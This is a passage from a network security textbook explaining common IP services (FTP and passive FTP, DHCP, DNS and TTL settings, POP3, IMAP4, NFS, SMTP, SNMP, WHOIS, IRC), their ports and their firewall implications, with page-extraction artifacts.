\nFTP is used to transfer file information from one system to another. FTP uses TCP as its transport and ports 20 \nand 21 for communication. Port 21 is used to transfer session information (username, password, commands), while \nport 20 is referred to as the data port and is used to transfer the actual file. \nFigure 3.15 shows an FTP command session between two systems (Loki is connecting to Thor). Notice the three-\npacket TCP handshake at the beginning of the session, which was described in the discussion on connection-\noriented communications earlier in this chapter. All communications are using a destination port of 21, which is \nsimply referred to as the FTP port. Port 1038 is the random upper port used by Loki when receiving replies. This \nconnection was initiated by Loki at port 1038 to Thor at port 21. \n \nFigure 3.15: An FTP command session between two systems \nFigure 3.16 shows Loki initiating a file transfer from Thor. Lines 7, 8, and 9 show the TCP three-packet \nhandshake. Lines 10 through 24 show the actual data transfer. \n \nFigure 3.16: An FTP data session \nThis is where things get a bit weird. Loki and Thor still have an active session on ports 1038 and 21, as indicated \nin Figure 3.15. Figure 3.16 is a second, separate session running parallel to the one shown in Figure 3.15. This \nsecond session is initiated in order to transfer the actual file or data. \n" }, { "page_number": 52, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 52\nThere is something else a bit odd about this connection: look closely at line number 7. Thor—not Loki—is \nactually initiating the TCP three-packet handshake in order to transfer the file information. While Loki was \nresponsible for initiating the original FTP command session to port 21, Thor is actually the one initiating the FTP \ndata session. \nThis means that in order to support FTP sessions to the Internet, we must allow connections to be established from \nInternet hosts on port 20 to our internal network. If our firewall device does not allow us to define a source port for \ninbound traffic (which some do not), we must leave all ports above 1023 completely open! Not exactly the most \nsecure security stance. \nPassive FTP \nThere is also a second type of FTP transfer known as passive FTP (PASV FTP). Passive FTP is identical to \nstandard FTP in terms of sending commands over port 21. The difference between PASV FTP and standard FTP \nlies in how the data session gets initiated. PASV FTP is the mode supported by most Web browsers. \nBefore transferring data, a client can request PASV mode transmission. If the FTP server acknowledges this \nrequest, the client is allowed to initiate the TCP three-packet handshake, instead of the server. Figure 3.17 shows a \ncapture of two systems using PASV FTP. Packet 21 shows “This workstation” (or FTP client) requesting that \nPASV FTP be used. In packet 22, the FTP server responds, stating that PASV mode is supported. \n \nFigure 3.17: A passive mode FTP session \nNotice what occurs in packet 23. Our FTP client initiates the TCP three-packet handshake in order to transfer data. \nThis fixes one problem but causes another. Since the client initiates the session, we can now close inbound access \nfrom port 20. This lets us tighten up our inbound security policy a bit. Note that to initiate this passive session, \nhowever, the client is using a random upper port number for the source and destination. This means that the port \nthe client will use to transfer data can and will change from session to session. This also means that in order to \nsupport PASV FTP, I must allow outbound sessions to be established on all ports above 1023. Not a very good \nsecurity stance if you are looking to control outbound Internet access (such as a policy forbidding Internet Quake \ngames). \nAs if all this were not enough to deal with, administrators can run into another problem with FTP when they use a \nfirewall or network translation (NAT) device. The problem revolves around the fact that FTP uses two separate \nsessions. \nNote \nNAT allows you to translate IP addresses from private numbers to legal numbers. This is \nuseful when the IP addresses you are using on your network were not assigned to you by \nyour ISP. We will talk more about NAT when we discuss firewalls in Chapter 5. \nWhile I am transferring a large file over the Internet (let’s say the latest 60MB patch file from Microsoft), my \ncontrol session to port 21 stays quiet. This session is not required to transmit any information during a file transfer \nuntil the transfer is complete. Once it is complete, the systems acknowledge over the control session that the file \nwas in fact received in its entirety. \nIf it has taken a long time to transfer the file (say, over an hour), the firewall or NAT device may assume that the \ncontrol session is no longer valid. Since it has seen no data pass between the two systems for a long period of time, \nthe device assumes that the connection is gone and purges the session entry from its tables. This is a bad thing—\nonce the file transfer is complete, the systems have no means to handshake to insure the file was received. The \ntypical symptom of this problem is that the client transferring or receiving the file hangs at 99 percent complete. \n" }, { "page_number": 53, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 53\nLuckily, most vendors make this timeout setting adjustable. If you are experiencing such symptoms, check your \nfirewall or NAT device to see if it has a TCP timeout setting. If so, simply increase the listed value. Most systems \ndefault to a timeout value of one hour. \nOther IP Services \nMany application services are designed to use IP as a transport. Some are designed to aid the end user in \ntransferring information, while others have been created to support the functionality of IP itself. Some of the most \ncommon services are described below, including the transport used for data delivery and the well-known port \nnumber assigned to the service. \nBoot Protocol (bootp) and Dynamic Host Configuration Protocol \n(DHCP) \nThere are three methods of assigning IP addresses to host systems: \nManual The user manually configures an IP host to use a specific address. \nAutomatic A server automatically assigns a specific address to a host during startup. \nDynamic A server dynamically assigns free addresses from a pool to hosts during startup. \nManual is the most time-consuming but the most fault tolerant. It requires that each IP host be configured with all \nthe information the system requires to communicate using IP. Manual is the most appropriate method to use for \nsystems that must maintain the same IP address or systems that must be accessible even when the IP address \nserver may be down. Web servers, mail servers, and any other servers providing IP services are usually manually \nconfigured for IP communications. \nBootp supports automatic address assignment. A table is maintained on the bootp server that lists each host’s \nMAC number. Each entry also contains the IP address to be used by the system. When the bootp server receives a \nrequest for an IP address, it references its table and looks for the sending system’s MAC number, returning the \nappropriate IP address for that system. While this makes management a little simpler, because all administration \ncan be performed from a central system, the process is still time-consuming, because each MAC address must be \nrecorded. It also does nothing to free up IP address space that may not be in use. \nDHCP supports both automatic and dynamic IP address assignments. When addresses are dynamically assigned, \nthe server issues IP addresses to host systems from a pool of available numbers. The benefit of a dynamic \nassignment over an automatic one is that only the hosts that require an IP address have one assigned. Once \ncomplete, the IP addresses can be returned to the pool to be issued to another host. \nNote \nThe amount of time a host retains a specific IP address is referred to as the lease period. A \nshort lease period insures that only systems requiring an IP address have one assigned. \nWhen IP is only occasionally used, a small pool of addresses can be used to support a \nlarge number of hosts. \nThe other benefit of DHCP is that the server can send more than just address information. The remote host can \nalso be configured with its host name, default router, domain name, local DNS server, and so on. This allows an \nadministrator to remotely configure IP services to a large number of hosts with a minimal amount of work. A \nsingle DHCP server is capable of servicing multiple subnets. \nThe only drawbacks with DHCP are \nƒ \nIncreased broadcast traffic (clients send an all-networks broadcast when they need an \naddress) \nƒ \nAddress space stability if the DHCP server is shut down \nOn many systems, the tables that track who has been assigned which addresses are saved in memory only. When \nthe system goes down, this table is lost. When you restart the system, IP addresses may be assigned to systems that \nwere already leased to another system prior to the shutdown. If this occurs, you may need to renew the lease on all \nsystems or wait until the lease time expires. \nNote \nBoth bootp and DHCP use UDP as their communication transport. Clients transmit \naddress requests from a source port of 68 to a destination port of 67. \n" }, { "page_number": 54, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 54\nDomain Name Services (DNS) \nDNS is responsible for mapping host names to IP addresses and vice versa. It is the service that allows you to \nconnect to Novell’s Web server by entering www.novell.com, instead of having to remember the system’s IP \naddress. All IP routing is done with addresses, not names. While IP systems do not use names when transferring \ninformation, names are easier for people to remember; DNS was developed to make reaching remote systems that \nmuch easier. DNS allows a person to enter an easy-to-remember name while allowing the computer to translate \nthis into the address information it needs to route the requested data. \nDNS follows a hierarchical, distributed structure. No single DNS server is responsible for keeping track of every \nhost name on the Internet. Each system is responsible for only a portion of the framework. \nFigure 3.18 shows an example of how DNS is structured. Visually it resembles a number of trees strapped to a \npole and hanging upside down. The pole is not meant to represent the backbone of the Internet; it simply indicates \nthat there is DNS connectivity between the different domains. The systems located just below the pole are referred \nto as the root name servers. Each root name server is responsible for one or more top-level domains. Examples of \ntop-level domains are the .com, .edu, .org, .mil, or .gov found at the end of a domain name. Every domain that \nends in .com is said to be part of the same top-level domain. \n \nFigure 3.18: A visual representation of the hierarchical structure of DNS \nThe root name servers are responsible for keeping track of the DNS servers for each subdomain within a top-level \ndomain. They do not know about individual systems within each subdomain, only the DNS servers that are \nresponsible for them. Each subdomain DNS server is responsible for tracking the IP addresses for all the hosts \nwithin its domain. \nLet’s walk through an example to see how it works. Let’s say you’re part of the foobar.com domain. You are \nrunning a Web browser and have entered the following URL: \nhttp://www.sun.com \nYour system will first check its DNS cache (if it has one) to see if it knows the IP address for www.sun.com. If \nit does not, it forms a DNS query (a DNS query is simply a request for IP information) and asks one of the DNS \nservers within the foobar.com domain for the address. Let’s assume the system it queries is ns.foobar.com. \nIf ns.foobar.com does not have this information cached, it also forms a DNS query and forwards the request to the \nroot name server responsible for the top-level domain .com, because this is where the Sun domain is located. \nThe root name server will consult its tables and form a reply similar to this: “I do not know the IP address for \nwww.sun.com. I do, however, know that ns.sun.com is responsible for all the hosts within the sun.com \ndomain. Its IP address is 10.5.5.1. Please forward your query to that system.\" This reply is then sent to \nns.foobar.com. \nNs.foobar.com now knows that if it needs to find a system with the sun.com domain, it needs to ask ns.sun.com. \nNs.foobar.com caches this name server information and forwards the request to ns.sun.com. \nNs.sun.com will in turn consult its tables and look up the IP address for www.sun.com. Ns.sun.com will then \nforward the IP address to ns.foobar.com. Ns.foobar.com will then cache this address and forward the answer to \nyour system. Your system can now use this IP address information to reach the remote Web server. \nIf you think that there is a whole lot of querying going on, then you have a good understanding of the process. The \nadditional traffic is highly preferable, however, to the amount of overhead that would be required to allow a single \nsystem to maintain the DNS information for every system on the Internet. \n" }, { "page_number": 55, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 55\nAs you may have noticed, DNS makes effective use of caching information during queries. This helps to reduce \ntraffic when looking up popular sites. For example, if someone else within foobar.com now attempted to reach \nwww.sun.com, the IP address for this system has been cached by ns.foobar.com. It can now answer this query \ndirectly. \nThe amount of time that ns.foobar.com remembers this information is determined by the time to live (TTL) set for \nthis address. The TTL is set by the administrator responsible for managing the remote name server (in this case \nns.sun.com). If www.sun.com is a stable system, this value may be set at a high value, such as 30 days. If it is \nexpected that the IP address for www.sun.com is likely to change frequently, the TTL may be set to a lower \nvalue, such as a few hours. \nCaveats about the TTL Settings \nLet’s look at an example to see why it is important to properly manage your TTL settings. Let’s say the mail relay \nfor foobar.com is run from the system mail.foobar.com. Let’s also assume that a high TTL value of 30 days has \nbeen set in order to reduce the number of DNS queries entering the network from the Internet. Finally, let’s \nassume that your network has changed ISPs and you have been assigned a new set of IP numbers to use when \ncommunicating with the Internet. \nThe network is readdressed, and the changeover takes place. Immediately users begin to receive phone calls from \npeople saying that mail sent to their address is being returned with a delivery failure notice. The failure is \nintermittent—some mail gets through, while other messages fail. \nWhat went wrong? Since the TTL value has been set for 30 days, remote DNS servers will remember the old IP \naddress until the TTL expires. If someone sent mail to the foobar.com domain the day before the changeover, it \nmay be 30 days before their DNS server creates another query and realizes that the IP address has changed! \nUnfortunately, the domains most likely affected by this change are the ones you exchange mail with the most. \nThere are two ways to resolve this failure: \n1. Ignore it and hide under your desk. Once the TTL expires, mail delivery will return to \nnormal. \n2. Contact the DNS administrator for each domain you exchange mail with and ask \nthem to reset their DNS cache. This will force the remote system to look up the \naddress the next time a mail message must be sent. This option is not only \nembarrassing—it may be impossible when dealing with large domains such as AOL \nor CompuServe. \nAvoiding this type of failure takes some fundamental planning. Simply turn down the TTL value to an extremely \nshort period of time (like one hour) at least 30 days prior to the changeover. This forces remote systems to cache \nthe information for only a brief amount of time. Once the changeover is complete, the TTL can be adjusted back \nup to 30 days to help reduce traffic. Thirty days is a good TTL value for systems that are not expected to change \ntheir host name or address. \n \nNote \nDNS \nuses \nTCP \nand \nUDP \ntransp\norts \nwhen \ncomm\nunicati\nng. \nBoth \nuse a \ndestina\ntion \nport of \n53. \n" }, { "page_number": 56, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 56\nHypertext Transfer Protocol (HTTP) \nHTTP is used in communications between Web browsers and Web servers. It differs from most services in that it \ndoes not create and maintain a single session while a user is retrieving information from a server. Every request \nfor information—text, graphics, or sound—creates a separate session, which is terminated once that request is \ncompleted. A Web page with lots of graphics needs to have multiple simultaneous connections created in order to \nbe loaded onto a browser. It is not uncommon for a Web browser to create 10, 20, or even 50 sessions with a Web \nserver just to read a single page. \nSince version 1.0, HTTP has included Multimedia Internet Mail Extensions (MIME) to support the negotiation of \ndata types. This has helped HTTP to become a truly cross-platform service, since MIME allows the Web browser \nto inform the server what type of file formats it can support. MIME also allows the server to alert the Web browser \nas to what type of data it is about to receive. This allows the browser to select the correct, platform-specific \nviewing or playing software for the data it is about to receive. \nNote \nHTTP uses the TCP transport and a destination port of 80 when communicating. \nPost Office Protocol (POP) \nPost Office Protocol is typically used when retrieving mail from a UNIX shell account. It allows a user to read her \nmail without creating a telnet connection to the system. When you dial in to your ISP in order to retrieve your \nmail, you are typically using the POP protocol in order to retrieve mail from a UNIX system. \nWhen a UNIX user receives an e-mail message, it is typically stored in the /var/spool/mail directory. Normally this \nmessage could be retrieved remotely by telnetting to the system and running the mail command. While it is a \nuseful utility, mail does not have much of a user interface. To the inexperienced user, the commands can seem \ncryptic and hard to remember. \nPOP allows a user to connect to the system and retrieve her mail using her username and password. POP does not \nprovide shell access; it simply retrieves any mail messages the user may have pending on the system. \nThere are a variety of mail clients available that support POP (POP3 is the latest version), so the user has a good \namount of freedom to choose the e-mail client she likes best. \nWhen using POP3, the user has the option to either leave her messages up on the POP server and view them \nremotely (online mail) or download the messages to the local system and read them offline (offline mail). Leaving \nthe messages on the server allows the system administrator to centrally back up everyone’s mail when backing up \nthe server. The drawback, however, is that if the user never deletes her messages (I’ve seen mailboxes with over \n12,000 messages), the load time for the client can be excruciatingly long. Because a copy of each message is left \nup on the server, all messages must be downloaded every time the client connects. \nThe benefit of using the POP client in offline mode is that local folders can be created to organize old messages. \nBecause messages are stored locally, the load time for many messages is relatively short. This can provide a \ndramatic improvement in speed when the POP server is accessed over a dial-up connection. Note that only local \nfolders can be used. POP3 does not support the use of global or shared folders. The downside to offline mode is \nthat each local system must be backed up to insure recovery in the event of a drive failure. Most POP clients \noperate in offline mode. \nOne of POP3’s biggest drawbacks is that it does not support the automatic creation of global address books. Only \npersonal address books can be used. For example, if your organization is using a POP3 mail system, you have no \nway of automatically viewing the addresses of other users on the system. This leaves you with two options: \nƒ \nYou can manually discover the other addresses through some other means and add \nthem to your personal address book. \nƒ \nYou can require that the system administrator generate a list of e-mail addresses on the \nsystem and e-mail this list to all users. Each user can then use the file to update his or \nher personal address book. \nNeither option is particularly appealing, so POP is best suited for the home Internet user who does not need \nsharable address books or folders. For business use, the IMAP4 protocol (discussed in the next section) is more \nappropriate. \nWhen a message is delivered by a POP3 client, the client forwards the message either back to the POP server or on \nto a central mail relay. Which of these is performed depends on how the POP client is configured. In either case, \nthe POP client uses Simple Mail Transfer Protocol (SMTP, discussed in an upcoming section) when delivering \n" }, { "page_number": 57, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 57\nnew messages or replies. This forwarding system, not the POP client, is ultimately responsible for the delivery of \nthe message. \nBy using a forwarding mail relay, the POP client can disconnect from the network before the message is delivered \nto its final destination. While most SMTP messages are delivered very quickly (in less than one second), a busy \nmail system can take 10 minutes or more to accept a message. Using a forwarding system helps to reduce the \namount of time a remote POP client is required to remain dialed in. \nIf the mail relay encounters a problem (such as a typo in the recipient’s e-mail address) and the message cannot be \ndelivered, the POP client will receive a delivery failure notice the next time it connects to the POP server. \nNote \nPOP3 uses TCP as a transport and communicates using a destination port of 110. \nInternet Message Access Protocol, Version 4 (IMAP4) \nIMAP was designed to be the next evolutionary step from the Post Office Protocol. While it has the same features \nas POP, it includes many more, which allow it to scale more easily in a workgroup environment. \nAs with POP3, the user has the option to either leave messages up on the server and view them remotely (online \nmail) or download the messages to the local system and read them offline (offline mail). IMAP, however, supports \na third connection mode referred to as disconnected. \nIn online mode, all messages are stored on the IMAP server. While it can be time-consuming to start up a POP \nmail client in online mode if many messages are involved, IMAP avoids this problem through the use of flags. \nAs you’ve seen, when a POP client connects to a POP server, the client will simply authenticate and begin to \ndownload messages. All messages on the server are considered to be new and unread, which means that the user’s \nentire inbox must be transferred before messages can be viewed or read. When an IMAP client connects to an \nIMAP server, however, it authenticates and checks the flag status on existing messages. Flagging allows a \nmessage to be marked as “seen,” “deleted,” or “answered.” This means that an IMAP client can be configured to \ncollect only messages that have not been seen, avoiding the transfer of the entire mailbox. \nIn offline mode, connection time can be reduced through the use of previewing. Previewing allows the user to scan \nthe header information of all new messages without actually transferring them to her local system. If the user is \nlooking to remotely retrieve only a specific message, she can choose which messages to receive and which \nmessages to leave on the server as unread. The user can also delete messages based upon the header information or \nfile size without having to transfer them to the local system first. This can be a real time-saver if you usually \nretrieve your mail remotely and you receive a lot of unsolicited advertisements. \nIMAP includes a third connection mode not supported by POP, referred to as disconnected. (Someone certainly \nhad a twisted sense of humor when they called it that—you can just see the poor support people pulling their hair \nout over this one: “I disconnected my computer just like the instructions said, so how come I can’t see my mail?”) \nWhen a remote IMAP client is operating in disconnected mode, it retrieves only a copy of all new messages. The \noriginals are left up on the IMAP server. The next time the client connects to the system, the server is \nsynchronized with any changes made to the cached information. This mode has a few major benefits: \nƒ \nConnection time is minimized, reducing network traffic and/or dial-in time. \nƒ \nMessages are centrally located so they can be backed up easily. \nƒ \nBecause all messages are server-based, mail can be retrieved from multiple clients \nand/or multiple computers. \nThe last benefit is extremely useful in an environment where people do not always work from the same computer. \nFor example, an engineer who works from home a few days a week can easily keep his mail synchronized \nbetween his home and work computers. When working in offline mode, as most POP clients do, mail retrieved by \nthe engineer’s work system would not be viewable on his home system. An IMAP client does not have this \nlimitation. \nAnother improvement over POP is that IMAP supports the writing of messages up to the server. This allows a user \nto have server-based folders instead of just local ones. These folders can be synchronized in disconnect mode, as \nwell. \nIMAP also supports group folders. This allows mail users to have bulletin board areas where messages can be \nposted and viewed by multiple people. This functionality is similar to news under NNTP (a description of NNTP \nand news follows). Group folders provide an excellent means of sharing information. For example, the Human \nResources department could set up a group folder for corporate policy information. This would reduce the need to \ncreate printed manuals. \n" }, { "page_number": 58, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 58\nTip \nIf you are using IMAP or if your current e-mail system supports group folders, create one \nentitled computer support or something similar. In it you can post messages providing \nsupport for some of your most common support calls. This can help reduce the number of \nsupport calls received and provide the user with written directions about how to work \nthrough a problem. You can even add screen captures, which can make resolving the \nproblem much easier than walking through it over the phone would. \nIMAP has been designed to integrate with the Application Configuration Access Protocol (ACAP). ACAP is an \nindependent service that allows a client to access configuration information and preferences from a central \nlocation. Support for ACAP enhances the portability of IMAP even further. \nFor example, our engineer who works from home a few days a week could also store his personal address book \nand configuration information up on the server, as well. If he is at work and adds a new name and e-mail address \nto his address book, that name would be available when he is using his home system. This would not be true with \nPOP where each client has a separate address book saved on each local system. ACAP also insures that any \nconfiguration changes would take effect on both systems. \nACAP provides mail administrators some control to set up corporate standards for users when accessing mail. For \nexample, the administrator can set up a global address book that everyone could access. \nNote \nIMAP uses TCP as a transport with a destination port of 143. \nNetwork File System (NFS) \nNFS provides access to remote file systems. The user can access the remote file system as if the files were located \non the local system. NFS provides file access only. This means that other functionality such as processor time or \nprinting must be provided by the local system. \nNFS requires configuration changes on both the server and the client. On the server, the file system to be shared \nmust first be exported. This is done by defining which files are to be made sharable. This can be a single directory \nor an entire disk. You must also define who has access to this file system. \nOn the client side, the system must be configured to mount the remote file system. On a UNIX machine this is \ndone by creating an entry in the system’s /etc/fstab file, indicating the name of the remote system, the file system \nto be mounted, and where it should be placed on the local system. In the UNIX world, this is typically a directory \nstructure located under a directory. In the DOS world, the remote file system may be assigned a unique drive \nletter. DOS and Windows require third-party software in order to use NFS. \nWhile it offers a convenient way to share files, NFS suffers from a number of functional deficiencies. File transfer \ntimes are slow when compared to FTP or NetWare’s NCP protocol. NFS has no file-locking capability to insure \nthat only one user can write to a file. As if this were not bad enough, NFS makes no assurances that the \ninformation has been received intact. I’ve seen situations where entire directories have been copied to a remote \nsystem using NFS and have become corrupted in transit. Because NFS does not check data integrity, the errors \nwere not found until the files were processed. \nNote \nNFS uses the UDP transport and communicates using port 2049. \nNetwork News Transfer Protocol (NNTP) \nNNTP is used in the delivery of news. News is very similar in functionality to e-mail, except messages are \ndelivered to newsgroups, not end users. Each newsgroup is a storage area for messages that follow a common \nthread or subject. Instead of a mail client, a news client is used to read messages that have been posted to different \nsubject areas. \nFor example, let’s say you are having trouble configuring networking on your NetWare server. You could check \nout the messages that have been posted to the newsgroup comp.os.netware.connectivity to see if anyone else has \nfound a solution to the same problem. There are literally tens of thousands of newsgroups on a wide range of \nsubjects. My own personal favorites are \ncomp.protocols \nalt.clueless \nalt.barney.dinosaur.die.die.die \nIn order to read news postings, you must have access to a news server. News servers exchange messages by \nrelaying any new messages they receive to other servers. The process is a bit slow: it can take three to five days for \na new message to be circulated to every news server. \n" }, { "page_number": 59, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 59\nNews is very resource intensive. It’s not uncommon for a news server to receive several gigabits of information \nper week. The processes required to send, receive, and clean up old messages can eat up a lot of CPU time, as \nwell. \nNews has dwindled in appeal over the last few years due to an activity known as spamming. Spamming is the \nactivity of posting unsolicited or off-subject messages. For example, at the time of this writing \ncomp.os.netware.connectivity contains 383 messages. Of these, 11 percent are advertisements for get-rich-quick \nschemes, 8 percent are ads for computer-related hardware or services, 6 percent are postings describing the \nsender’s opinion on someone or something using many superlatives, and another 23 percent are NetWare-related \nbut have nothing to do with connectivity. This means that only slightly more than half the postings are actually on-\ntopic. For some groups the percentages are even worse. \nNote \nNNTP uses TCP as a transport and port 119 for all communications. \nNetBIOS over IP \nNetBIOS over IP is not a service per se, but it does add session layer support to enable the encapsulation of \nNetBIOS traffic within an IP packet. This is required when using Windows NT or Samba, which use NetBIOS for \nfile and printer sharing. If IP is the only protocol bound to an NT server, it is still using NetBIOS for file sharing \nvia encapsulation. \nSamba is a suite of programs that allows UNIX file systems and printers to be accessed as shares. In effect, this \nmakes the UNIX system appear to be an NT server. Clients can be other UNIX systems (running the Samba client) \nor Windows 95/98/NT/2000 systems. The Windows clients do not require any additional software, because they \nuse the same configuration as when they are communicating with an NT/2000 server. \nThe source code for Samba is available as freeware on the Internet. More than 15 different flavors of UNIX are \nsupported. \nNote \nWhen NetBIOS is encapsulated within IP, both TCP and UDP are used as a transport. All \ncommunications are conducted on ports 137–139. \nSimple Mail Transfer Protocol (SMTP) \nSMTP is used to transfer mail messages between systems. SMTP uses a message-switched type of connection: \neach mail message is processed in its entirety before the session between two systems is terminated. If more than \none message must be transferred, a separate session must be established for each mail message. \nSMTP is capable of transferring ASCII text only. It does not have the ability to support rich text or transfer binary \nfiles and attachments. When these types of transfers are required, an external program is needed to first translate \nthe attachment into an ASCII format. \nThe original programs used to provide this functionality were uuencode and uudecode. A binary file would first be \nprocessed by uuencode to translate it into an ASCII format. The file could then be attached to a mail message and \nsent. Once received, the file would be processed through uudecode to return it to its original binary format. \nUuencode/uudecode has been replaced by the use of MIME. While MIME performs the same translating duties, it \nalso compresses the resulting ASCII information. The result is smaller attachments, which produce faster message \ntransfers with reduced overhead. Apple computers use an application called Binhex, which has the same \nfunctionality as MIME. MIME is now supported by most UNIX and PC mail systems. \nUuencode/uudecode, Binhex, and MIME are not compatible. If you can exchange text messages with a remote \nmail system but attachments end up unusable, you are probably using different translation formats. Many modern \nmail gateways provide support for both uuencode/uudecode and MIME to eliminate such communication \nproblems. Some even include support for Binhex. \nNote \nSMTP uses the TCP transport and destination port 25 when creating a communication \nsession. \nSimple Network Management Protocol (SNMP) \nSNMP is used to monitor and control network devices. The monitoring or controlling station is referred to as the \nSNMP management station. The network devices to be controlled are required to run SNMP agents. The agents \nand the management station work together to give the network administrator a central point of control over the \nnetwork. \nNote \nThe SNMP agent provides the link into the networking device. The device can be a \nmanageable hub, a router, or even a server. The agent uses both static and dynamic \n" }, { "page_number": 60, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 60\ninformation when reporting to the management station. \nThe static information is data stored within the device in order to identify it uniquely. For example, the \nadministrator may choose to store the device’s physical location and serial number as part of the SNMP static \ninformation. This makes it easier to identify which device you’re working with from the SNMP management \nstation. \nThe dynamic information is data that pertains to the current state of the device. For example, port status on a hub \nwould be considered dynamic information, as the port may be enabled or disabled depending on whether it is \nfunctioning properly. \nThe SNMP management station is the central console used to control all network devices that have SNMP agents. \nThe management station first learns about a network device through the use of a management information base \n(MIB). The MIB is a piece of software supplied by the network device vendor, usually on floppy disk. When the \nMIB is added to the management station, it teaches the management station about the network device. This helps \nto insure that SNMP management stations created by one vendor will operate properly with network devices \nproduced by another. \nInformation is usually collected by the SNMP management station through polling. The SNMP management \nstation will issue queries at predetermined intervals in order to check the status of each network device. SNMP \nonly supports two commands for collecting information: get and getnext. The get command allows the \nmanagement station to retrieve information on a specific operating parameter. For example, the management \nstation may query a router to report on the current status of one of its ports. The getnext command is used when a \ncomplete status will be collected from a device. Instead of forcing the SNMP management station to issue a series \nof specific get commands, getnext can be used to sequentially retrieve each piece of information a device can \nreport on. \nSNMP also allows for the controlling of network devices through the command set. The set command can be used \nto alter some of the operational parameters on a network device. For example, if your get command reported that \nport 2 on the router was disabled, you could issue a set command to the router to enable the port. \nSNMP typically does not offer the same range of control as a network device’s management utility. For example, \nwhile you may be able to turn ports on and off on our router, you would probably be unable to initialize IP \nnetworking and assign an IP address to the port. The amount of control available through SNMP is limited by \nwhich commands are included in the vendor’s MIB, as well as the command structure of SNMP itself. The \noperative word in SNMP is “simple.” SNMP provides only a minimal amount of control over network devices. \nWhile most reporting is done by having the SNMP management station poll network devices, SNMP does allow \nnetwork devices to report critical events immediately back to the management station. These messages are called \ntraps. Traps are sent when an event occurs that is important enough to not wait until the device is again polled. For \nexample, your router may send a trap to the SNMP management console if it has just been power cycled. Because \nthis event will have a grave impact on network connectivity, it is reported to the SNMP management station \nimmediately instead of waiting until the device is again polled. \nNote \nSNMP uses the UDP transport and destination ports 161 and 162 when \ncommunicating. \nTelnet \nTelnet is used when a remote communication session is required with some other system on the network. Its \nfunctionality is similar to a mainframe terminal or remote control session. The local system becomes little more \nthan a dumb terminal providing screen updates only. The remote system supplies the file system and all processing \ntime required when running programs. \nNote \nTelnet uses the TCP transport and destination port 23 when creating a communication \nsession. \nWHOIS \nWHOIS is a utility used to gather information about a specific domain. The utility usually connects to the system \nrs.internic.net and displays administrative contact information as well as the root servers for a domain. \nThis is useful when you wish to find out what organization is using a particular domain name. For example, typing \nthe command \nwhois sun.com \nwill produce the following information regarding the domain: \nSun Microsystems Inc. (SUN) SUN.COM 192.9.9.1 \nSun Microsystems, Inc. (SUN-DOM) SUN.COM \n" }, { "page_number": 61, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 61\nIf you performed a further search by entering the command \nwhois sun-dom \nadditional information would be produced: \nSun Microsystems, Inc. (SUN-DOM) \n2550 Garcia Avenue \nMountain View, CA 94043 \nDomain Name: SUN.COM \nAdministrative Contact, Technical Contact, Zone Contact: \nLowe, Fredrick (FL59) Fred.Lowe@SUN.COM \n408-276-4199 \nRecord last updated on 21-Nov-96. \nRecord created on 19-Mar-86. \nDatabase last updated on 16-Jun-97 05:26:09 EDT. \nDomain servers in listed order: \nNS.SUN.COM 192.9.9.3 \nVGR.ARL.MIL 128.63.2.6, 128.63.16.6, 128.63.4.4 \nThe InterNIC Registration Services Host contains ONLY Internet Information \n(Networks, ASN’s, Domains, and POC’s). \nPlease use the whois server at nic.ddn.mil for MILNET Information. \nWHOIS can be an extremely powerful troubleshooting tool: you now know who is responsible for maintaining the \ndomain, how to contact them, and which systems are considered to be primary name servers. You could then use a \nDNS tool such as nslookup to find the IP addresses of Sun’s mail systems or even their Web server. \nNote \nWHOIS uses the TCP transport and destination port 43 when creating a communication \nsession. \nIRC \nIRC (Internet Relay Chat) protocol allows clients to communicate in real time. It is made up of various separate \nnetworks (known as nets) of IRC servers. Users run a client that connects them to a server on one of the nets. The \nserver relays information to and from other servers on the same net. Once connected to an IRC server, a user will \nbe presented with a list of one or more topical channels. Channel names usually being with a #, such as #irchelp, \nand since all servers on a given net share the same list of channels, users connected to any server on that net can \ncommunicate with one another. \nNote \nChannels that begin with a & instead of a # are local to a given server only, and are not \nshared with other servers on the net. \nEach IRC client is distinguished from other clients by a unique nickname (or nick). Servers store additional \ninformation about each client, including the real name of the host that the client is running on, the username of the \nclient on that host, and the server to which the client is connected. \nOperators are those clients that have been given the ability to perform maintenance on the IRC nets, such as \ndisconnecting and reconnecting servers as needed to correct for any network routing problems. Operators can also \nforcibly remove other clients from the network by terminating their connection. Operators can be assigned to a \nserver, or just to a channel, and they are identified by @ symbol next to their nick. \nNote \nIRC can use both TCP and UDP as transports, and most modern IRC servers \nlisten on ports 6667–7000. \n \nUpper Layer Communications \nOnce we get above the session layer, our communications become pretty specific to the \nprogram we’re using. The responsibilities of the presentation and application layers are more \na function of the type of service requested than the underlying protocol in use. Data translation \nand encryption are considered portable features. \nNote \nPortable means that these features can be applied easily to different services \nwithout regard for the underlying protocol. It does not matter if I’m using IP or IPX \n" }, { "page_number": 62, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 62\nto transfer my data, the ability to leverage these features will depend on the \napplication in use. \nFor example, Lotus has the ability to encrypt mail messages prior to transmission. This activity \nis performed at the presentation layer of the program. It does not matter if I’m connecting to \nmy mail system via TCP, SPX, or a modem. The encryption functionality is available with all \nthree protocols, because the functionality is made available by the program itself. Lotus Notes \nis not dependent on the underlying protocol. \nSummary \nIn this chapter, we began by discussing the anatomy of an Ethernet frame and how systems \non a local Ethernet segment communicate. We also covered how routing is used to assist \ncommunication in large networking environments. From there we looked at the different \nmethods of connection establishment and finished off the chapter by discussing IP services. \nFor a more in-depth look at any of these technologies, you might want to refer to Multiprotocol \nNetwork Design and Troubleshooting (Sybex, 1997). \nIn the next chapter, we will begin to look at some of the insecurities involved in everyday \ncommunications. We will look at how building security into your core network design can not \nonly improve performance (always a good thing)—it can make your data less susceptible to \nattack, as well. \n \nChapter 4: Topology Security \nIn this chapter, we will look at the communication properties of network transmissions. You will also see what \ninsecurities exist in everyday network communications—and how you can develop a network infrastructure that \nalleviates some of these problems. \nUnderstanding Network Transmissions \nIt is no accident that the National Security Agency, which is responsible for setting the encryption standards for \nthe U.S. government, is also responsible for monitoring and cracking encrypted transmissions that are of interest to \nthe government. In order to know how to make 